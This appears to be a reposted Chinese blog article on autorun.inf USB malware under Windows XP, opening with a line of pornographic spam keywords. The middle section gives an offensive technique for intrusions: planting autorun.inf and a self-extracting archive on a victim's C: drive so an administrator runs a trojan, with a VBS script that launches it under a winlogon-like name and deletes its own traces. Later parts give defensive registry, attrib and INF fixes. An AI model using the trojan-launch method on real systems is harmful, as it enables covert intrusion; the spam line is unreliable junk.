国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

在zj1244小葵&職業(yè)欠錢的blog上看到的，感覺不錯，轉之~

首先是autorun.inf
一般的病毒的Autorun.inf文件內容為
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe

shellexecute=.\RECYCLER\RECYCLER\autorun.exe
它的效果是當雙擊打開盤時.會運行RECYCLER\RECYCLER\autorun.exe文件,用右鍵打開,會顯示Open,Browser.
還有一種是
[autorun]
OPEN=SVCH0ST.EXE
shell\open=打開(&O)
shell\open\Command=SVCH0ST.EXE
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=SVCH0ST.EXE
對于這種U盤病毒，無論右鍵選擇“打開”還是“資源管理器”病毒都會運行。
一種利用autorun.inf提權的方法（轉）
以前看過很多關于AutoRun.inf的利用文章,網(wǎng)上全是千篇一律,互相模仿.我再來添點東西吧~

還是先簡單說下原理吧.寫一個AutoRun.inf文件,放在對方某一盤符下,當管理員雙擊此盤時,就會執(zhí)行AutoRun.inf指定的文件了.一般用在入侵時沒有運行權限時,欺騙管理員幫你運行..

以前我在網(wǎng)上看到的都是一個模式

[AutoRun]

open = 你想運行的程序

先不說這樣運行是不是成功的,稍微想一下,就知道有問題,人家管理員不是傻子,這樣雙擊是打不開盤符的,人家肯定知道出問題了,所以你玩不長的..

事實上那個文件在我機子是運行不起的,網(wǎng)上也沒找到解決辦法,相信還有很多人和我遇到過同樣的問題,求人不如求已,自己搞定吧.

也不難,只要這樣寫就OK了:

[AutoRun]
open=AutoRun.exe
shellexecute=AutoRun.exe
shell\Auto\command=AutoRun.exe

這樣,你把它保存為一個.inf文件,放在C盤下,AutoRun.exe為你指定的運行程序.這樣雙擊C盤就可以成功運行了.前面還說過一個問題,就是C盤打不開,很容易就被管理員發(fā)現(xiàn)了,有待改進.下來就說怎么解決這個問題,GO ON!

其實這個實現(xiàn)起來也不難,先把AutoRun.inf上傳至對方C盤,我們可以做一個自解壓包,也放在C盤根目錄下,讓他成為我們的指定運行文件,里面包含我們要運行的程序,比如木馬,還一個VBS腳本,自解壓包執(zhí)行后先讓他執(zhí)行VBS腳本,內容如下:

set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start WINLOG0N.exe",0
yu.run "cmd /c del AutoRun.inf",0
yu.run "cmd /c start c:\",0
yu.run "cmd /c del AutoRun.vbs",0

我再簡單解釋下,解壓后VBS幫我們運行winlogon.exe(我配置好的木馬),然后刪掉AutoRun.inf,為什么要刪掉它,第一,減少被發(fā) 現(xiàn)的機會,二,刪掉它,管理員重啟機子或注銷后如果右鍵點擊盤復符不會出現(xiàn)"播放",一切恢復中馬前的狀態(tài),當然之前我們的木馬已經(jīng)運行了.第四行代碼: 我們?yōu)樗蜷_C盤,最后再刪掉vbs腳本自身.

這樣改進后個人覺得安全性大大提高了.呵呵..各位在測試的時候只須把上面腳本中的 WINLOG0N.exe改為自己的木馬就可以了.winxp sp2下測試成功。
防治方法
其實這個文件不是病毒。也是用來打開病毒了。防治它的思路有兩種：一是禁用自動播放，二是刪除它，三是阻止它生成。
1。在Windows系統(tǒng)有允許和阻止自動運行的鍵值的方法：

　　 在注冊表中找到如下鍵：

鍵路徑：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]

在右側窗格中有 "NoDriveTypeAutoRun"這個鍵決定了是否執(zhí)行Autorun功能.其中每一位代表一個設備,不同設備用以下數(shù)值表示:


設備名稱 第幾位 值 設備用如下數(shù)值表示 設備名稱含義
DRIVE_UNKNOWN 0 1 01h 不能識別的類型設備
DRIVE_NO_ROOT_DIR 1 0 02h 沒有根目錄的驅動器
DRIVE_REMOVABLE 2 1 04h 可移動驅動器
DRIVE_FIXED 3 0 08h 固定的驅動器
DRIVE_REMOTE 4 1 10h 網(wǎng)絡驅動器
DRIVE_CDROM 5 0 20h 光驅
DRIVE_RAMDISK 6 0 40h RAM磁盤

其中： 保留 7 1 80h 　未指定的驅動器類型

以上值"0"表示設備運行，"1"表示設備不運行。
從上面可以看出，對應的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自動運 行的。所以要禁止硬盤自動運行AutoRun.inf文件，就必須將DRIVE_FIXED這些鍵的值設為1，由于DRIVE_FIXED代表固定的驅動 器(即硬盤)。如果僅想禁止軟件光盤的AutoRun功能，但又保留對CD音頻碟的自動播放能力，這時只需將“NoDriveTypeAutoRun”的 鍵值改為：BD,00,00,00即可。
     還有就是通過組策略關閉自動播放，但是在有些版本window xp 中不存在哪個策略。
2。為了防止autorun.inf的生成，我們可以在u盤根目錄下創(chuàng)建一個名字是autorun.inf的文件夾。
3。我們可以選擇在dos下刪除文件，但是在通常情況下autorun.inf有系統(tǒng)，隱藏，只讀屬性。所以應該先去掉這些屬性之后再刪除文件。具體方法如下：
開始---運行---cmd（打開命令提示符）
D: dir /a a* （沒有參數(shù)A是看不到的，A是顯示所有的意思）
此時你會發(fā)現(xiàn)一個autorun.inf文件，
attrib autorun.inf -s -h -r 去掉autorun.inf文件的系統(tǒng)、只讀、隱藏屬性。然后就可以刪除了
del AutoRun.inf
二.常見的病毒
通過autorun文件可以打開任何文件，所以很難講什么是常見的。我所覺得有趣的是，運行病毒之后，病毒的自我保護方法。比如說存在保護程序，禁用注冊表，禁用顯示隱藏文件選項或文件夾選項。隱藏進程等等。
1。注冊表的禁用與解用。

最好的方法是下載個注冊表修復工具
你先到這里看看瑞星的注冊表修復工具http://it.rising.com.cn/service/technology/RegClean_download.htm
如果仍然不能解決請按1樓的方法試試
假如"運行"被禁止掉那么請用下面介紹的方法

注冊表編輯器已被禁用，我們用INF文件來解除。那么我們可以在記事本里寫入下面的內容：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁注冊表編輯器
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0

然后把文件另存為一個INF文件，右擊文件----點“安裝”就可以啦^O^
我們可以看到第一個語段，在Signature后面的簽名"$Windows NT$"它是指明我的操作系統(tǒng)是NT的，如果你的操作系統(tǒng)是98的在后面的簽名中應該寫"$CHICAGO$"。
再看第二個語段，等號左邊的“ADDREG”是不能更改的，等號右邊的內容就隨你的心情啦，但是有一點要注意，就是要與在第三個語段中使用的語句保持一致。另外還有一項操作是“DELREG”(刪除鍵)和“ADDREG”的用法一樣，后面介紹。
好了，這回各位看觀是不是想要躍躍欲試了呢，不要著急，好像還有一點和REG文件不一樣噢，呵呵我看出來了，就是在文件的最后，怎么有“，”(注：逗號)。還有“HKCU”這些都是什么呀？
這就是與REG文件不一樣的格式啦。
“HKCU”指的是注冊表中的根鍵，其中“HKCU”是“HKEY_CURRENT_USER”的縮寫，其它的還有“HKCR”--- “HKEY_CLASSES_ROOT”、“HKLM”----“HKEY_LOCAL_MACHINE”、“HKU”---- “HKEY_USERS”、“HKCC”----“HKEY_CURRENT_CONFIG”、“HKDD”----“HKEY_DYN_DATA”。如 果你想要對哪個根鍵操作那么就可以按照上面的縮寫對號入座了。
“，”(注：逗號)，它是根鍵與子鍵、子鍵與鍵名、鍵名與鍵類型、鍵類型與鍵值的分割符。
在具體修改注冊表鍵值語段的格式為：根鍵，子鍵，鍵名，鍵類型，鍵值(注：中間的逗號不能省略)。
上面這個文件中我們知道其實要修改的是DisableRegistryTools鍵，把它的值改為“0”。它的類型為DWORD(雙字節(jié))，在INF文件 有關注冊表的操作中有字符串類型(用“0”表示)和二進制類型(用“1”表示)，在網(wǎng)上沒有找到INF文件表示雙字節(jié)類型的資料，望知道的人補充。在這里 我們直接用二進制類型就可以了，所以大家看到在鍵類型的位置上是個“1”，最后是要修改的鍵值“0”。
前面提到“DELREG”它是刪除鍵值的操作，如果要想把DisableRegistryTools鍵刪除的話可以這樣寫：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
DELREG=Mydel

[Mydel]
;刪除DisableRegistryTools鍵
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

就是省略掉鍵類型和鍵值字段，最后把這個文件另存為一個INF文件，右擊文件----點“安裝”就可以了。
好了，不知道各位看觀是不是看明白了，沒看明白也沒關系，我寫了一個，大家只要把下面的內容復制到記事本中，然后把這個文件另存為一個INF文件，最后右 擊文件----點“安裝”就可以了。(注：這個文件可以解決前文中所提到問題，只能在NT系統(tǒng)中使用，主頁會被改成20CN的首頁，嘻嘻做個廣告啦 ^O^)。

-----------------------------------------------------------------------------------
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁注冊表編輯器
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0
2。顯示出被隱藏的系統(tǒng)文件

運行——regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL，將CheckedValue鍵值修改為1

這里要注意，病毒會把本來有效的DWORD值CheckedValue刪除掉，新建了一個無效的字符串值CheckedValue，并且把鍵值改為0！我 們將這個改為1是毫無作用的。（有部分病毒變種會直接把這個CheckedValue給刪掉，只需和下面一樣，自己再重新建一個就可以了）

方法：刪除此CheckedValue鍵值，單擊右鍵 新建——Dword值——命名為CheckedValue，然后修改它的鍵值為1，這樣就可以選擇“顯示所有隱藏文件”和“顯示系統(tǒng)文件”。

在文件夾——工具——文件夾選項中將系統(tǒng)文件和隱藏文件設置為顯示。